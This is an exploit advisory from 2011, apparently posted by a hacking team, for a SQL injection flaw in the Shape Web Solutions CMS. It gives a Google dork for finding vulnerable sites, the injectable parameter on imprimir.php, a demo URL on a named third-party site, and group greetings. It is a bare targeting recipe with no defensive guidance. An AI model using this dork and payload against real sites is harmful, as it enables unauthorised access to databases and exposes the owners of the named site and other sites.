######################################################################################### Shape Web Solutions CMS SQL Injection Vulnerability ######################################################################################### # # # Exploit Title: Shape Web Solutions CMS SQL Injection Vulnerability # # Arrow Credit : Ashiyane Digital Security Team # # Date: 03-18-2011 # # Author: HashoR # # Vendor or Software Link: http://www.shapeweb.com.br/ # # Version: All version # # Category:: webapps # # Google dork: inurl:".br/imprimir.php?id=" # # Exploit : /imprimir.php?id=1' # # Demo site: http://marcoeusebio.com.br/imprimir.php?id=8325' # # # ######################################################################################### # [Greetz] # # # # Zend -=- Virangar-=-Milad-Bushehr -=- Iman_TakTaz -=- M3QD4D -=- Hijacker # # -=- elvator -=- r3d.z0nE -=- Behrooz_Ice -=- Ali_Eagle -=- Satanic2000 -=- Rz04 # # # ###################################### TNX All ##########################################